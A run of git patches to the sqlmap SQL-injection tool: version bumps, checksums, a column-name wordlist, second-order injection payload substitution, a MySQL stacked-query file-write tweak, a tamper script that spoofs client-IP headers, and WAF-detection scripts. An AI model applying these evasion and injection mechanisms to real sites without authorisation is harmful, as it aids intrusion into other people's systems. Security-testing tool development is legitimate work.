272/428] add u_pass to columns (#3231) --- txt/common-columns.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/txt/common-columns.txt b/txt/common-columns.txt index bc9f0a0e2f2..3535a2e4c20 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -1,6 +1,6 @@ # Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission - +u_pass id name user_id From f01ae291f8ec77fdb049d316a1978e22f84bad7b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 10:27:28 +0200 Subject: [PATCH 273/428] Update related to the #3231 --- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- txt/common-columns.txt | 6 +++++- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 51c44ce1bb5..18350e10778 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.13" +VERSION = "1.2.9.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 86c7c7d17e7..f3e89a5ba44 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -20762b473b8d387b6f2d6b13aafb0ff1 lib/core/settings.py +39d2ca4b1e85f4cf9ac27d965a758ea4 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py diff --git a/txt/common-columns.txt b/txt/common-columns.txt index 3535a2e4c20..8efec7578e2 100644 --- a/txt/common-columns.txt +++ b/txt/common-columns.txt @@ -1,6 +1,6 @@ # Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) # See the file 'LICENSE' for copying permission -u_pass + id name user_id @@ -2601,3 +2601,7 @@ waktu # WebGoat cookie login_count + +# Misc + +u_pass \ No newline at end of file From 470b68a83cfcaa1fcfbb6b42f544ab040282d7c8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 11:47:19 +0200 Subject: [PATCH 274/428] Implementation for Issue #3226 --- lib/core/settings.py | 2 +- lib/request/connect.py | 14 ++++++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 15 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 18350e10778..7de5f884a72 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.14" +VERSION = "1.2.9.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1bcc2c1a43c..199dd8284da 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -16,6 +16,7 @@ import struct import time import traceback +import urllib import urllib2 import urlparse @@ -84,6 +85,7 @@ class WebSocketException(Exception): from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER +from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER @@ -97,6 +99,7 @@ class WebSocketException(Exception): from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import MIN_TIME_RESPONSES +from lib.core.settings import IDS_WAF_CHECK_PAYLOAD from lib.core.settings import IS_WIN from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER @@ -1238,8 +1241,15 @@ def _randomizeParameter(paramString, randomParameter): if conf.secondUrl: page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) - elif kb.secondReq: - page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) + elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""): + def _(value): + if CUSTOM_INJECTION_MARK_CHAR in (value or "") and kb.customInjectionMark: + if payload is None: + value = value.replace(CUSTOM_INJECTION_MARK_CHAR, "") + else: + value = re.sub(r"\w*%s" % re.escape(CUSTOM_INJECTION_MARK_CHAR), payload, value) + return value + page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastPage = page diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f3e89a5ba44..8b0fb71b654 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -39d2ca4b1e85f4cf9ac27d965a758ea4 lib/core/settings.py +c4ab9e38f258b0666e19ffdb5537cbbf lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -4ac4e1d10210bb1bc3d64a3532c5ff8b lib/request/connect.py +3146b6639369b3f629e23860baffff17 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From c9a73aeed104aacbc549abae6e1c156cb58ee726 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 11:51:00 +0200 Subject: [PATCH 275/428] Minor patch for #3226 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 7de5f884a72..fa7c35e647a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.15" +VERSION = "1.2.9.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 199dd8284da..0c24e576517 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1243,11 +1243,11 @@ def _randomizeParameter(paramString, randomParameter): page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""): def _(value): - if CUSTOM_INJECTION_MARK_CHAR in (value or "") and kb.customInjectionMark: + if kb.customInjectionMark in (value or ""): if payload is None: - value = value.replace(CUSTOM_INJECTION_MARK_CHAR, "") + value = value.replace(kb.customInjectionMark, "") else: - value = re.sub(r"\w*%s" % re.escape(CUSTOM_INJECTION_MARK_CHAR), payload, value) + value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value) return value page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8b0fb71b654..3877c4aa9ed 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c4ab9e38f258b0666e19ffdb5537cbbf lib/core/settings.py +b8cbaa6f57a74b5ad7c258d93dcd8f0c lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -3146b6639369b3f629e23860baffff17 lib/request/connect.py +cb148ee9778fdd61bdfc6b524aa1b3a2 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From a8c07226318ab904a389d567aa916399602460d2 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 10 Sep 2018 12:43:59 +0200 Subject: [PATCH 276/428] Minor update regarding #3230 --- lib/core/dicts.py | 4 ++++ lib/core/settings.py | 2 +- plugins/dbms/mysql/filesystem.py | 2 ++ txt/checksum.md5 | 6 +++--- 4 files changed, 10 insertions(+), 4 deletions(-) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 4ea69a8a53c..b291aeff947 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -263,6 +263,10 @@ "commit ", "rollback ", ), + + "SQL administration": ( + "set ", + ), } POST_HINT_CONTENT_TYPES = { diff --git a/lib/core/settings.py b/lib/core/settings.py index fa7c35e647a..494f81ca2ec 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.16" +VERSION = "1.2.9.17" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 15819ab67c1..a81c9d1b65a 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -162,6 +162,8 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): logger.debug("inserting the hexadecimal encoded file to the support table") + inject.goStacked("SET GLOBAL max_allowed_packet = %d" % (1024 * 1024)) # 1MB (Note: https://github.com/sqlmapproject/sqlmap/issues/3230) + for sqlQuery in sqlQueries: inject.goStacked(sqlQuery) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3877c4aa9ed..78b187eb6d1 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -36,7 +36,7 @@ a69c59bec0b35442139d1c29f1b05797 lib/core/common.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py 4086fb55f42e27de5330505605baad0f lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py -db165596ef0a3e19ec59c24192bb318d lib/core/dicts.py +4d50e0f893477196d83608175d1a7de4 lib/core/dicts.py d4b3d448bcfd9f15d089fc81d38f4825 lib/core/dump.py ab3f4f3e3019add5f4a2e28f7e8748a4 lib/core/enums.py cada93357a7321655927fc9625b3bfec lib/core/exception.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -b8cbaa6f57a74b5ad7c258d93dcd8f0c lib/core/settings.py +d9d75c1383a83e6ccabf7157202c2288 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -172,7 +172,7 @@ f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py 11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -2f97535b5cfb28eac0d51bf67a0304f7 plugins/dbms/mysql/filesystem.py +34216d44fe66ffc8c5b4a0714839cf9f plugins/dbms/mysql/filesystem.py 34d951003dca386719c4d91384d2669a plugins/dbms/mysql/fingerprint.py 30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py 0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py From 16c052ef1368b49295991cefdadd23022ce1738c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 12 Sep 2018 14:39:07 +0200 Subject: [PATCH 277/428] Fixes #3234 (user entered input) --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 55379f7b203..98ba41adfff 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1179,7 +1179,7 @@ def checkFile(filename, raiseOnError=True): try: if filename is None or not os.path.isfile(filename): valid = False - except UnicodeError: + except: valid = False if valid: diff --git a/lib/core/settings.py b/lib/core/settings.py index 494f81ca2ec..2b15c294a90 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.17" +VERSION = "1.2.9.18" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 78b187eb6d1..3e6f9d37f1f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -30,7 +30,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 8eb0a5dbd79bd58fedac4c0cc344246b lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -a69c59bec0b35442139d1c29f1b05797 lib/core/common.py +cbf9428039f52d8ee80fcf79b6583b7c lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d9d75c1383a83e6ccabf7157202c2288 lib/core/settings.py +9b9a0dbc9e47aa07545f1e157ebb3d4e lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py From db8bcd1d2e0bf0ead66ebbef9e07ff40e996408e Mon Sep 17 00:00:00 2001 From: xxbing <35004327+xxbing@users.noreply.github.com> Date: Thu, 13 Sep 2018 16:50:58 +0800 Subject: [PATCH 278/428] update xforwarder tamper (#3236) --- tamper/xforwardedfor.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tamper/xforwardedfor.py b/tamper/xforwardedfor.py index 6cd5c81131b..f4cdda1140a 100644 --- a/tamper/xforwardedfor.py +++ b/tamper/xforwardedfor.py @@ -25,4 +25,6 @@ def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) headers["X-Forwarded-For"] = randomIP() + headers["X-Clinet-Ip"] = randomIP() + headers["X-Real-Ip"] = randomIP() return payload From 6697e49f753f27cfd6abb2ee5054cbd204d15ea9 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 13 Sep 2018 11:09:17 +0200 Subject: [PATCH 279/428] Adding aesecure and crawlprotect WAF scripts --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 +++- waf/aesecure.py | 25 +++++++++++++++++++++++++ waf/crawlprotect.py | 19 +++++++++++++++++++ 4 files changed, 48 insertions(+), 2 deletions(-) create mode 100644 waf/aesecure.py create mode 100644 waf/crawlprotect.py diff --git a/lib/core/settings.py b/lib/core/settings.py index 2b15c294a90..87472e89d0c 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.18" +VERSION = "1.2.9.19" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3e6f9d37f1f..9b1307fc7cb 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -50,7 +50,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9b9a0dbc9e47aa07545f1e157ebb3d4e lib/core/settings.py +ef7c758b79feb71ddb3376df9149d562 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 815d1cf27f0f8738d81531e73149867d lib/core/target.py @@ -392,6 +392,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py +0ce8a335c7eb9cf14e645f64b3a5e91f waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py @@ -407,6 +408,7 @@ ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py 94b50385a9d462492e3a639d71aaa1c3 waf/cloudflare.py 29ba81741fd7e220a95fe7c5fae76e1a waf/cloudfront.py ac96f34c254951d301973617064eb1b5 waf/comodo.py +c84e515440fe482476c1f2687bd9960f waf/crawlprotect.py 56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py 1538b661e35843074f4599be93b3fae9 waf/denyall.py 0182d23b34cf903537f77f4ec4b144bf waf/distil.py diff --git a/waf/aesecure.py b/waf/aesecure.py new file mode 100644 index 00000000000..083d1aad445 --- /dev/null +++ b/waf/aesecure.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "aeSecure (aeSecure)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, _ = get_page(get=vector) + retval = headers.get("aeSecure-code") is not None + retval |= all(_ in (page or "") for _ in ("aeSecure", "aesecure_denied.png")) + if retval: + break + + return retval diff --git a/waf/crawlprotect.py b/waf/crawlprotect.py new file mode 100644 index 00000000000..ed1698f961b --- /dev/null +++ b/waf/crawlprotect.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "CrawlProtect (Jean-Denis Brun)" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, _, code = get_page(get=vector) + retval = code >= 400 and "This site is protected by CrawlProtect" in (page or "") + + return retval From a633bc7f32ebdb339717ad627755e932e1c3f387 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 13 Sep 2018 11:41:19 +0200 Subject: [PATCH 280/428] Trivial cleanup --- extra/wafdetectify/wafdetectify.py | 2 -- lib/core/settings.py | 2 +- lib/core/target.py | 1 - lib/request/connect.py | 1 - plugins/generic/takeover.py | 3 +-- txt/checksum.md5 | 20 ++++++++++---------- waf/aesecure.py | 3 --- waf/cloudfront.py | 1 - waf/distil.py | 3 --- waf/varnish.py | 1 - 10 files changed, 12 insertions(+), 25 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 248a009e77d..f75c9f0a844 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -13,9 +13,7 @@ import re import subprocess import sys -import urllib import urllib2 -import urlparse sys.dont_write_bytecode = True diff --git a/lib/core/settings.py b/lib/core/settings.py index 87472e89d0c..7c91cb454cd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.9.19" +VERSION = "1.2.9.20" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/target.py b/lib/core/target.py index 4691cec83e9..4653cb6b027 100644 --- a/lib/core/target.py +++ b/lib/core/target.py @@ -5,7 +5,6 @@ See the file 'LICENSE' for copying permission """ -import codecs import functools import os import re diff --git a/lib/request/connect.py b/lib/request/connect.py index 0c24e576517..711a76effbe 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -85,7 +85,6 @@ class WebSocketException(Exception): from lib.core.exception import SqlmapValueException from lib.core.settings import ASTERISK_MARKER from lib.core.settings import BOUNDARY_BACKSLASH_MARKER -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR from lib.core.settings import DEFAULT_CONTENT_TYPE from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index e53eeedd1d9..88a261040fa 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -125,8 +125,7 @@ def osPwn(self): raise SqlmapMissingPrivileges(errMsg) try: - from impacket import ImpactDecoder - from impacket import ImpactPacket + __import__("impacket") except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9b1307fc7cb..a8f816ad911 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -22,7 +22,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -0142de525def5e3f17092dcc1ed67c95 extra/wafdetectify/wafdetectify.py +1c7e6968f71214f8a0355420f3914f27 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py 2058987606ad75435c69d28cab11ef9e lib/controller/checks.py c414cecdb0472c92cf50ed5b01e4438c lib/controller/controller.py @@ -50,10 +50,10 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ef7c758b79feb71ddb3376df9149d562 lib/core/settings.py +03a73c87322c0165d98bcc1df2794e9f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py -815d1cf27f0f8738d81531e73149867d lib/core/target.py +248bd121e0565318e1efaff54aa427bc lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py e896992e4db26605ab1e73615b1f9434 lib/core/threads.py c40758411bb0bd68764d78e0bb72bd0f lib/core/unescaper.py @@ -72,7 +72,7 @@ f2af274126ce0a789027d35d367f2b9e lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 2b81435f5a7519298c15c724e3194a0d lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -cb148ee9778fdd61bdfc6b524aa1b3a2 lib/request/connect.py +84f9cb02454fa21a619ccd2b3fd294d4 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py @@ -216,7 +216,7 @@ f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -4adc07051b727f1525cf0a2d619221f8 plugins/generic/takeover.py +a37c21cc3fa5c0c220d33d450bf503ed plugins/generic/takeover.py 4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ @@ -286,7 +286,7 @@ cc212839f55692d422beef3a8e22a8d4 tamper/uppercase.py f2b9eac52d346315f5705f71beeda791 tamper/varnish.py 0e40966a51d1eb5d42a2159d2015a8a4 tamper/versionedkeywords.py 0fba004bf1be6edbefbda89f23f4e518 tamper/versionedmorekeywords.py -de532c4e3160039335010c499129d54f tamper/xforwardedfor.py +23d845e9f937f2a31c43767b8a8fcff6 tamper/xforwardedfor.py b422795c5e589decec725963e480ffba thirdparty/ansistrm/ansistrm.py d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py 8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py @@ -392,7 +392,7 @@ d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqlud ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ 0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 336d0b0d2be333f5a6184042c85464fd waf/360.py -0ce8a335c7eb9cf14e645f64b3a5e91f waf/aesecure.py +9bf2e07cdc54a661aea056223caccfb6 waf/aesecure.py a73a40d201b39f3387714c59934331e4 waf/airlock.py 7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py b61329e8f8bdbf5625f9520ec010af1f waf/armor.py @@ -406,12 +406,12 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py 